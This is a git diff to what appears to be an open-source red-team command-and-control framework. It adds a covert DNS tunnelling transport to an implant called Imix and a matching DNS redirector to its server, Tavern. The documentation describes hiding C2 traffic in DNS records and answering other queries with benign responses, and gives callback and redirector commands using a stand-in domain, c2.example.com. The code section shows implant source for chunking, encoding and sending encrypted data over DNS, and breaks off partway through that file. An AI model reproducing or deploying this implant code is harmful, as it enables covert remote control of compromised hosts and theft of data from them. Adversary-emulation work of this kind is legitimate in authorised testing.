diff --git a/docs/_docs/admin-guide/tavern.md b/docs/_docs/admin-guide/tavern.md index 66f4d99c9..01ef40c5c 100644 --- a/docs/_docs/admin-guide/tavern.md +++ b/docs/_docs/admin-guide/tavern.md @@ -104,7 +104,74 @@ Below are some deployment gotchas and notes that we try to address with Terrafor ## Redirectors -By default Tavern only supports GRPC connections directly to the server. To Enable additional protocols or additional IPs / Domain names in your callbacks utilize tavern redirectors which recieve traffic using a specific protocol like HTTP/1.1 and then forward it to an upstream tavern server over GRPC. See: `tavern redirector -help` +By default Tavern only supports gRPC connections directly to the server. To enable additional protocols or additional IPs/domain names in your callbacks, utilize Tavern redirectors which receive traffic using a specific protocol (like HTTP/1.1 or DNS) and then forward it to an upstream Tavern server over gRPC. + +### Available Redirectors + +Realm includes three built-in redirector implementations: + +- **`grpc`** - Direct gRPC passthrough redirector +- **`http1`** - HTTP/1.1 to gRPC redirector +- **`dns`** - DNS to gRPC redirector + +### Basic Usage + +List available redirectors: + +```bash +tavern redirector list +``` + +Start a redirector: + +```bash +tavern redirector --transport <transport> --listen <address> <upstream> +``` + +### HTTP/1.1 Redirector + +The HTTP/1.1 redirector accepts HTTP/1.1 traffic from agents and forwards it to an upstream gRPC server. + +```bash +# Start HTTP/1.1 redirector on port 8080 +tavern redirector --transport http1 --listen ":8080" localhost:8000 +``` + +### DNS Redirector + +The DNS redirector tunnels C2 traffic through DNS queries and responses, providing a covert communication channel. It supports TXT, A, and AAAA record types.
+ +```bash +# Start DNS redirector on UDP port 53 for domain c2.example.com +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com" localhost:8000 + +# Support multiple domains +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com&domain=backup.example.com" localhost:8000 +``` + +**DNS Configuration Requirements:** + +1. Configure your DNS server to delegate queries for your C2 domain to the redirector IP +2. Or run the redirector as your authoritative DNS server for the domain +3. Ensure UDP port 53 is accessible + +**Server Behavior:** + +- **Benign responses**: Non-C2 queries to A records return `0.0.0.0` instead of NXDOMAIN to avoid breaking recursive DNS lookups (e.g., when using Cloudflare as an intermediary) +- **Conversation tracking**: The server tracks up to 10,000 concurrent conversations +- **Timeout management**: Conversations timeout after 15 minutes of inactivity (reduced to 5 minutes when at capacity) +- **Maximum data size**: 50MB per request + +See the [DNS Transport Configuration](/user-guide/imix#dns-transport-configuration) section in the Imix user guide for more details on agent-side configuration. + +### gRPC Redirector + +The gRPC redirector provides a passthrough for gRPC traffic, useful for deploying multiple Tavern endpoints or load balancing. + +```bash +# Start gRPC redirector on port 9000 +tavern redirector --transport grpc --listen ":9000" localhost:8000 +``` ## Configuration diff --git a/docs/_docs/dev-guide/imix.md b/docs/_docs/dev-guide/imix.md index ae766e0b1..bea5aa0a4 100644 --- a/docs/_docs/dev-guide/imix.md +++ b/docs/_docs/dev-guide/imix.md @@ -91,29 +91,45 @@ pub use mac_address::MacAddress; ## Develop a New Transport -We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is complete abstracted from how Imix operates for callbacks/tome excution. 
For Imix all Transports live in the `realm/implants/lib/transport/src` directory. +We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. -If creating a new Transport create a new file in the directory and name it after the protocol you plan to use. For example, if writing a DNS Transport then call your file `dns.rs`. Then define your public struct where any connection state/clients will be. For example, +### Current Available Transports + +Realm currently includes three transport implementations: + +- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) +- **`http1`** - HTTP/1.1 transport +- **`dns`** - DNS-based covert channel transport + +**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. + +### Creating a New Transport + +If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, ```rust #[derive(Debug, Clone)] -pub struct DNS { - dns_client: Option +pub struct Custom { + // Your connection state here + // e.g., client: Option } ``` -NOTE: Depending on the struct you build, you may need to derive certain features, see above we derive `Debug` and `Clone`. +**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. Next, we need to implement the Transport trait for our new struct. 
This will look like: ```rust -impl Transport for DNS { +impl Transport for Custom { fn init() -> Self { - DNS{ dns_client: None } + Custom { + // Initialize your connection state here + // e.g., client: None + } } fn new(callback: String, proxy_uri: Option<String>) -> Result<Self> { // TODO: setup connection/client hook in proxy, anything else needed - // before fuctions get called. + // before functions get called. Err(anyhow!("Unimplemented!")) } async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result<ClaimTasksResponse> { @@ -169,20 +185,35 @@ impl Transport for DNS { NOTE: Be aware that currently `reverse_shell` uses tokio's sender/receiver while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currently it would just result in performance loss/less maintainable code. -After you implement all the functions/write in a decent error message for operators to understand why the function call failed then you need to import the Transport to the broader lib scope. To do this open up `realm/implants/lib/transport/src/lib.rs` and add in your new Transport like so: +After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: -```rust -// more stuff above +#### 1.
Add Compile-Time Exclusivity Checks -#[cfg(feature = "dns")] -mod dns; -#[cfg(feature = "dns")] -pub use dns::DNS as ActiveTransport; +In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: -// more stuff below +```rust +// Add your transport to the mutual exclusivity checks +#[cfg(all(feature = "grpc", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "dns", feature = "custom"))] +compile_error!("only one transport may be selected"); + +// ... existing checks above ... + +// Add your transport module and export +#[cfg(feature = "custom")] +mod custom; +#[cfg(feature = "custom")] +pub use custom::Custom as ActiveTransport; ``` -Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/transport/Cargo.toml`. +**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. + +#### 2. Update Transport Library Dependencies + +Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: ```toml # more stuff above @@ -190,23 +221,65 @@ Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/tra [features] default = [] grpc = [] -dns = [] # <-- see here +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = [] +dns = ["dep:data-encoding", "dep:rand"] +custom = ["dep:your-custom-dependency"] # <-- Add your feature here mock = ["dep:mockall"] +[dependencies] +# ... existing dependencies ... + +# Add any dependencies needed by your transport +your-custom-dependency = { version = "1.0", optional = true } + # more stuff below ``` -Then make sure the feature flag is populated down from the imix crate `realm/implants/imix/Cargo.toml` +#### 3. 
Enable Your Transport in Imix + +To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: + ```toml # more stuff above [features] -default = ["transport/grpc"] +# Check if compiled by imix +win_service = [] +default = ["transport/grpc"] # Default transport http1 = ["transport/http1"] dns = ["transport/dns"] +custom = ["transport/custom"] # <-- Add your feature here transport-grpc-doh = ["transport/grpc-doh"] # more stuff below ``` -And that's all that is needed for Imix to use a new Transport! Now all there is to do is setup the Tarver redirector see the [tavern dev docs here](/dev-guide/tavern#transport-development) +#### 4. Build Imix with Your Transport + +Compile imix with your custom transport: + +```bash +# From the repository root +cd implants/imix + +# Build with your transport feature +cargo build --release --features custom --no-default-features + +# Or for the default transport (grpc) +cargo build --release +``` + +**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. + +#### 5. Set Up the Corresponding Redirector + +For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: + +- `tavern/internal/redirectors/grpc/` - gRPC redirector +- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector +- `tavern/internal/redirectors/dns/` - DNS redirector + +Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. + +And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. 
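To make the `ActiveTransport` pattern above concrete, here is a self-contained sketch. This is not the real trait from `realm/implants/lib/transport/src/lib.rs` (which also has `claim_tasks`, `reverse_shell`, etc., and uses `anyhow::Result`); `Custom` and its `callback` field are hypothetical stand-ins:

```rust
// Minimal stand-in for the Transport trait; the real trait has more
// methods and different error types.
trait Transport: Clone + Send {
    fn init() -> Self;
    fn new(callback: String, proxy_uri: Option<String>) -> Result<Self, String>;
}

// Hypothetical transport; real implementations live in dns.rs, http1.rs, grpc.rs.
#[derive(Debug, Clone)]
struct Custom {
    callback: Option<String>,
}

impl Transport for Custom {
    fn init() -> Self {
        Custom { callback: None }
    }
    fn new(callback: String, _proxy_uri: Option<String>) -> Result<Self, String> {
        if callback.is_empty() {
            // Descriptive errors help operators diagnose failed callbacks.
            return Err("callback URI must not be empty".into());
        }
        Ok(Custom { callback: Some(callback) })
    }
}

// The cfg-gated alias: agent code only ever names ActiveTransport,
// so enabling a different feature swaps the transport everywhere.
type ActiveTransport = Custom;

fn main() {
    let t = ActiveTransport::new("dns://8.8.8.8:53?domain=c2.example.com".into(), None)
        .expect("transport should initialize");
    println!("{:?}", t.callback);
}
```

Because the agent depends only on the `ActiveTransport` alias, no agent code changes when a new transport feature is enabled.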
diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index 04e5f1cc1..3c1bca382 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -18,7 +18,7 @@ Building in the dev container limits variables that might cause issues and is th | Env Var | Description | Default | Required | | ------- | ----------- | ------- | -------- | -| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://`) | `http://127.0.0.1:8000` | No | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | | IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | automatic | Yes | | IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | | IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | @@ -33,6 +33,65 @@ Imix has run-time configuration, that may be specified using environment variabl | IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | | IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. 
+ +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://<server>?domain=<domain>[&type=<type>] +``` + +**Parameters:** +- `<server>` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` + +**Examples:** + +```bash +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" + +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" + +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" +``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests.
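The fallback rotation described above can be modeled in a few lines. This is an illustrative sketch, not the agent's actual code; `query` stands in for the real UDP DNS exchange:

```rust
/// Try each server in order starting from the last one that worked;
/// on success, return that server's index so the caller can start
/// there on the next request.
fn query_with_fallback<F>(servers: &[&str], current: usize, mut query: F) -> Option<usize>
where
    F: FnMut(&str) -> bool, // stand-in for "did the DNS exchange succeed?"
{
    for attempt in 0..servers.len() {
        let idx = (current + attempt) % servers.len();
        if query(servers[idx]) {
            return Some(idx); // becomes the new "current" server
        }
    }
    None // every configured server failed
}

fn main() {
    let servers = ["10.0.0.2:53", "1.1.1.1:53", "8.8.8.8:53"];
    // Simulate the first (internal) resolver being unreachable:
    // the agent rotates to the next server and sticks with it.
    let working = query_with_fallback(&servers, 0, |s| s != "10.0.0.2:53");
    println!("next request will use {}", servers[working.unwrap()]);
}
```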
+ +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 + ## Logging At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. @@ -100,6 +159,7 @@ These flags are passed to cargo build Eg.: - `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport - `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. +- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. 
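For a rough sense of the 253-character budget described under Protocol Details, the per-query payload capacity implied by these limits can be approximated as follows. This is an illustrative calculation only; it ignores the protobuf framing overhead that the real implementation also subtracts:

```rust
/// Approximate raw payload bytes that fit in one query, given the limits
/// above: 253 chars total, 63-char labels (each followed by a dot), and
/// Base32 encoding at 5 raw bytes per 8 encoded characters.
fn max_payload_bytes(base_domain: &str) -> usize {
    let available = 253usize.saturating_sub(base_domain.len());
    let complete_labels = available / 64; // 63 chars of data + 1 dot per label
    let max_encoded_chars = complete_labels * 63;
    max_encoded_chars * 5 / 8
}

fn main() {
    // Longer base domains leave less room for tunneled data per query,
    // which means more chunks (and more DNS queries) per request.
    println!("{}", max_payload_bytes("c2.example.com"));
    println!("{}", max_payload_bytes("a-much-longer-c2-base-domain.internal.corp.example.com"));
}
```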
## Setting encryption key diff --git a/implants/Cargo.toml b/implants/Cargo.toml index 32d1f3a3c..9c40bb378 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -61,6 +61,7 @@ anyhow = "1.0.65" assert_cmd = "2.0.6" async-recursion = "1.0.0" async-trait = "0.1.68" +base32 = "0.5" base64 = "0.21.4" chrono = "0.4.34" const-decoder = "0.3.0" @@ -126,6 +127,7 @@ tonic-build = { git = "https://github.com/hyperium/tonic.git", rev = "c783652" } trait-variant = "0.1.1" uuid = "1.5.0" static_vcruntime = "2.0" +url = "2.5" which = "4.4.2" whoami = { version = "1.5.1", default-features = false } windows-service = "0.6.0" diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index 2c313dc88..1b978749a 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -11,6 +11,7 @@ crate-type = ["cdylib"] win_service = [] default = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] transport-grpc-doh = ["transport/grpc-doh"] [dependencies] diff --git a/implants/imixv2/Cargo.toml b/implants/imixv2/Cargo.toml index b531ad720..79ebdd8c9 100644 --- a/implants/imixv2/Cargo.toml +++ b/implants/imixv2/Cargo.toml @@ -7,9 +7,10 @@ edition = "2024" crate-type = ["cdylib"] [features] -default = ["install", "grpc", "http1"] +default = ["install", "grpc", "http1", "dns"] grpc = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] win_service = [] install = [] diff --git a/implants/lib/pb/Cargo.toml b/implants/lib/pb/Cargo.toml index f5a8b4ae6..10a0fa1d4 100644 --- a/implants/lib/pb/Cargo.toml +++ b/implants/lib/pb/Cargo.toml @@ -8,6 +8,7 @@ default = [] imix = [] grpc = [] http1 = [] +dns = [] [dependencies] diff --git a/implants/lib/pb/build.rs b/implants/lib/pb/build.rs index cfff81dac..5acc469bd 100644 --- a/implants/lib/pb/build.rs +++ b/implants/lib/pb/build.rs @@ -109,5 +109,19 @@ fn main() -> Result<(), Box> { Ok(_) => println!("generated c2 protos"), }; + // Build DNS Protos (no encryption codec - used for transport 
layer only) + match tonic_build::configure() + .out_dir("./src/generated") + .build_server(false) + .build_client(false) + .compile(&["dns.proto"], &["../../../tavern/internal/c2/proto/"]) + { + Err(err) => { + println!("WARNING: Failed to compile dns protos: {}", err); + panic!("{}", err); + } + Ok(_) => println!("generated dns protos"), + }; + Ok(()) } diff --git a/implants/lib/pb/src/config.rs b/implants/lib/pb/src/config.rs index ef9a694f4..b0a8b2e57 100644 --- a/implants/lib/pb/src/config.rs +++ b/implants/lib/pb/src/config.rs @@ -2,6 +2,7 @@ use tonic::transport; use uuid::Uuid; use crate::c2::beacon::Transport; + /// Config holds values necessary to configure an Agent. #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] @@ -105,11 +106,13 @@ impl Config { let beacon_id = std::env::var("IMIX_BEACON_ID").unwrap_or_else(|_| String::from(Uuid::new_v4())); + #[cfg(feature = "dns")] + let transport = crate::c2::beacon::Transport::Dns; #[cfg(feature = "http1")] let transport = crate::c2::beacon::Transport::Http1; #[cfg(feature = "grpc")] let transport = crate::c2::beacon::Transport::Grpc; - #[cfg(not(any(feature = "http1", feature = "grpc")))] + #[cfg(not(any(feature = "dns", feature = "http1", feature = "grpc")))] let transport = crate::c2::beacon::Transport::Unspecified; let info = crate::c2::Beacon { diff --git a/implants/lib/pb/src/generated/c2.rs b/implants/lib/pb/src/generated/c2.rs index 853ee8285..816200dd5 100644 --- a/implants/lib/pb/src/generated/c2.rs +++ b/implants/lib/pb/src/generated/c2.rs @@ -42,6 +42,7 @@ pub mod beacon { Unspecified = 0, Grpc = 1, Http1 = 2, + Dns = 3, } impl Transport { /// String value of the enum field names used in the ProtoBuf definition. 
@@ -53,6 +54,7 @@ pub mod beacon { Transport::Unspecified => "TRANSPORT_UNSPECIFIED", Transport::Grpc => "TRANSPORT_GRPC", Transport::Http1 => "TRANSPORT_HTTP1", + Transport::Dns => "TRANSPORT_DNS", } } /// Creates an enum from field names used in the ProtoBuf definition. @@ -61,6 +63,7 @@ pub mod beacon { "TRANSPORT_UNSPECIFIED" => Some(Self::Unspecified), "TRANSPORT_GRPC" => Some(Self::Grpc), "TRANSPORT_HTTP1" => Some(Self::Http1), + "TRANSPORT_DNS" => Some(Self::Dns), _ => None, } } diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs new file mode 100644 index 000000000..7797109c5 --- /dev/null +++ b/implants/lib/pb/src/generated/dns.rs @@ -0,0 +1,125 @@ +// This file is @generated by prost-build. +/// DNSPacket is the main message format for DNS C2 communication +/// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct DnsPacket { + /// Packet type + #[prost(enumeration = "PacketType", tag = "1")] + pub r#type: i32, + /// Chunk sequence number (0-Based for INIT, 1-based for DATA) + #[prost(uint32, tag = "2")] + pub sequence: u32, + /// 8-character random conversation ID + #[prost(string, tag = "3")] + pub conversation_id: ::prost::alloc::string::String, + /// Chunk payload (or InitPayload for INIT packets) + #[prost(bytes = "vec", tag = "4")] + pub data: ::prost::alloc::vec::Vec<u8>, + /// Optional CRC32 for validation + #[prost(uint32, tag = "5")] + pub crc32: u32, + /// Async protocol fields for windowed transmission + /// + /// Number of packets client has in-flight + #[prost(uint32, tag = "6")] + pub window_size: u32, + /// Ranges of successfully received chunks (SACK) + #[prost(message, repeated, tag = "7")] + pub acks: ::prost::alloc::vec::Vec<AckRange>, + /// Specific sequence numbers to retransmit + #[prost(uint32, repeated, tag = "8")] + pub nacks: ::prost::alloc::vec::Vec<u32>, +} +///
AckRange represents a contiguous range of acknowledged sequence numbers +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct AckRange { + /// Inclusive start of range + #[prost(uint32, tag = "1")] + pub start_seq: u32, + /// Inclusive end of range + #[prost(uint32, tag = "2")] + pub end_seq: u32, +} +/// InitPayload is the payload for INIT packets +/// It contains metadata about the upcoming data transmission +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct InitPayload { + /// 2-character gRPC method code (e.g., "ct", "fa") + #[prost(string, tag = "1")] + pub method_code: ::prost::alloc::string::String, + /// Total number of data chunks to expect + #[prost(uint32, tag = "2")] + pub total_chunks: u32, + /// CRC32 checksum of complete request data + #[prost(uint32, tag = "3")] + pub data_crc32: u32, + /// Total size of the file/data in bytes + #[prost(uint32, tag = "4")] + pub file_size: u32, +} +/// FetchPayload is the payload for FETCH packets +/// It specifies which response chunk to retrieve +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct FetchPayload { + /// Which chunk to fetch (1-based) + #[prost(uint32, tag = "1")] + pub chunk_index: u32, +} +/// ResponseMetadata indicates the response is chunked and must be fetched +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct ResponseMetadata { + /// Total number of response chunks + #[prost(uint32, tag = "1")] + pub total_chunks: u32, + /// CRC32 checksum of complete response data + #[prost(uint32, tag = "2")] + pub data_crc32: u32, + /// Size of each chunk (last may be smaller) + #[prost(uint32, tag = "3")] + pub chunk_size: u32, +} +/// PacketType defines the type of DNS packet in the conversation +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, ::prost::Enumeration)] 
+#[repr(i32)] +pub enum PacketType { + Unspecified = 0, + /// Establish conversation + Init = 1, + /// Send data chunk + Data = 2, + /// Retrieve response chunk + Fetch = 3, + /// Server status response with ACKs/NACKs + Status = 4, +} +impl PacketType { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. + pub fn as_str_name(&self) -> &'static str { + match self { + PacketType::Unspecified => "PACKET_TYPE_UNSPECIFIED", + PacketType::Init => "PACKET_TYPE_INIT", + PacketType::Data => "PACKET_TYPE_DATA", + PacketType::Fetch => "PACKET_TYPE_FETCH", + PacketType::Status => "PACKET_TYPE_STATUS", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. + pub fn from_str_name(value: &str) -> ::core::option::Option<Self> { + match value { + "PACKET_TYPE_UNSPECIFIED" => Some(Self::Unspecified), + "PACKET_TYPE_INIT" => Some(Self::Init), + "PACKET_TYPE_DATA" => Some(Self::Data), + "PACKET_TYPE_FETCH" => Some(Self::Fetch), + "PACKET_TYPE_STATUS" => Some(Self::Status), + _ => None, + } + } +} diff --git a/implants/lib/pb/src/lib.rs b/implants/lib/pb/src/lib.rs index f65dc9036..a1c4efaea 100644 --- a/implants/lib/pb/src/lib.rs +++ b/implants/lib/pb/src/lib.rs @@ -4,5 +4,8 @@ pub mod eldritch { pub mod c2 { include!("generated/c2.rs"); } +pub mod dns { + include!("generated/dns.rs"); +} pub mod config; pub mod xchacha; diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index e92cc091a..6f52aaad0 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,6 +8,7 @@ default = [] grpc = ["pb/grpc"] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = ["pb/http1"] +dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] mock = ["dep:mockall"] [dependencies] @@ -15,6 +16,7 @@ pb = { workspace = true }
anyhow = { workspace = true } bytes = { workspace = true } +futures = { workspace = true } log = { workspace = true } prost = { workspace = true } prost-types = { workspace = true } @@ -27,6 +29,9 @@ hyper = { version = "0.14", features = [ ] } # Had to use an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } +base32 = { workspace = true, optional = true } +rand = { workspace = true, optional = true } +url = { workspace = true, optional = true } # [feature = mock] mockall = { workspace = true, optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs new file mode 100644 index 000000000..cef8ece3b --- /dev/null +++ b/implants/lib/transport/src/dns.rs @@ -0,0 +1,1603 @@ +use crate::Transport; +use anyhow::{Context, Result}; +use pb::c2::*; +use pb::dns::*; +use prost::Message; +use std::sync::mpsc::{Receiver, Sender}; +use tokio::net::UdpSocket; + +// Protocol limits +const MAX_LABEL_LENGTH: usize = 63; +const MAX_DNS_NAME_LENGTH: usize = 253; +const CONV_ID_LENGTH: usize = 8; +const DNS_RESPONSE_BUF_SIZE: usize = 4096; + +// Async protocol configuration +const SEND_WINDOW_SIZE: usize = 10; // Packets in flight +const MAX_RETRIES_PER_CHUNK: u32 = 3; // Max retries for a chunk +const MAX_DATA_SIZE: usize = 50 * 1024 * 1024; // 50MB max data size + +// DNS resolver fallbacks +const FALLBACK_DNS_SERVERS: &[&str] = &["1.1.1.1:53", "8.8.8.8:53"]; + +/// DNS record type for queries +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum DnsRecordType { + TXT, // Text records (default, base32 encoded) + A, // IPv4 address records (binary data) + AAAA, // IPv6 address records (binary data) +} + +/// DNS transport using stateless packet protocol with protobuf +#[derive(Debug, Clone)] +pub struct DNS { + base_domain: String, + dns_servers: Vec<String>,
// Primary + fallback DNS servers + current_server_index: usize, + record_type: DnsRecordType, // DNS record type to use for queries +} + +impl DNS { + /// Marshal request using ChaCha encoding + fn marshal_with_codec<Req, Resp>(msg: Req) -> Result<Vec<u8>> + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::encode_with_chacha::<Req, Resp>(msg) + } + + /// Unmarshal response using ChaCha encoding + fn unmarshal_with_codec<Req, Resp>(data: &[u8]) -> Result<Resp> + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::decode_with_chacha::<Req, Resp>(data) + } + + /// Generate unique conversation ID + fn generate_conv_id() -> String { + use rand::Rng; + const CHARSET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789"; + let mut rng = rand::thread_rng(); + (0..CONV_ID_LENGTH) + .map(|_| { + let idx = rng.gen_range(0..CHARSET.len()); + CHARSET[idx] as char + }) + .collect() + } + + /// Calculate CRC32 checksum + fn calculate_crc32(data: &[u8]) -> u32 { + let mut crc = 0xffffffffu32; + for &byte in data { + crc ^= byte as u32; + for _ in 0..8 { + if crc & 1 != 0 { + crc = (crc >> 1) ^ 0xedb88320; + } else { + crc >>= 1; + } + } + } + !crc + } + + /// Calculate maximum data size that will fit in DNS query + fn calculate_max_chunk_size(&self, total_chunks: u32) -> usize { + // DNS limit: total_length <= 253 + // Format: <label>.<label>...<base_domain>
+ // total_length = encoded_length + ceil(encoded_length / 63) + base_domain_length + + let base_domain_len = self.base_domain.len(); + let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len); + + // Calculate max encoded length where: encoded + ceil(encoded/63) <= available + // For n complete labels (63 chars each): n*63 + n = n*64 + // So: floor(available / 64) * 63 gives us the safe amount + let complete_labels = available / 64; + let max_encoded_length = complete_labels * 63; + + // Base32: 5 bytes protobuf -> 8 chars encoded + // protobuf_length = encoded_length * 5 / 8 + let max_protobuf_length = (max_encoded_length * 5) / 8; + + // Calculate protobuf overhead with worst-case varint sizes + let sample_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: total_chunks, + conversation_id: "a".repeat(CONV_ID_LENGTH), + data: vec![], + crc32: 0xFFFFFFFF, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let overhead = sample_packet.encoded_len(); + + // Max data size is what fits after overhead + max_protobuf_length.saturating_sub(overhead) + } + + /// Encode data using Base32 (DNS-safe, case-insensitive) + fn encode_data(data: &[u8]) -> String { + // Use RFC4648 alphabet (A-Z, 2-7) without padding, converted to lowercase + base32::encode(base32::Alphabet::Rfc4648 { padding: false }, data).to_lowercase() + } + + /// Build DNS query subdomain from packet + /// Format: . 
